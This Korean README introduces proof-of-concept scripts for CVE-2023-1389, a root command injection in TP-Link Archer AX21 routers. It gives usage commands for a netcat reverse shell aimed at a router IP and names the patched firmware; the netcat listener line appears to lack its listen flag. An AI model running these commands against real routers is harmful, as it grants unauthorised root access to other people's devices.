
# CVE-2023-1389 개념 증명 스크립트 TP-Link Archer AX21의 인증되지 않은 명령 주입 취약점(CVE-2023-1389)에 대한 개념 증명 스크립트로, 파일 전송 및 리버스 셸 기능을 제공합니다.
CVE-2023–1389는 TP-Link Archer AX21 WiFi 라우터에서 발생하는 인증되지 않은 명령 주입 취약점입니다. country 매개변수의 콜백은 popen() 함수를 사용하며, 이 함수는 root 권한으로 실행되므로 공격자가 인증 없이 관리 인터페이스에 GET 또는 POST 요청을 통해 임의의 값을 주입할 수 있습니다. 취약점에 대한 자세한 내용은 여기에서 확인할 수 있습니다.
다음은 제가 명령 주입을 탐구하면서 만든 몇 가지 Proof-of-Concept입니다. Archer-file-transfer.py는 첫 번째 버전으로 상호작용 방식이 다소 복잡합니다. Archer-rev-shell.py는 간단한 netcat 리버스 셸을 제공하며, 아마도 여러분이 찾고 계신 바로 그것일 것입니다. 이 스크립트들의 개발 과정에 대해 더 알고 싶다면 여기 게시물을 읽어보세요.
한 터미널 창에서:
nc your_IP listener_port
다른 터미널 창에서:
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
TP-Link는 취약한 콜백을 제거하여 이 문제를 해결한 펌웨어 버전 1.1.4 Build 20230219를 출시했습니다. 라우터를 최신 펌웨어로 업데이트하면 장치를 보호할 수 있습니다.
이 PoC들을 유지보수하지 않을 가능성이 높습니다. 둘 다 매우 간단하며 필요에 따라 쉽게 수정할 수 있습니다.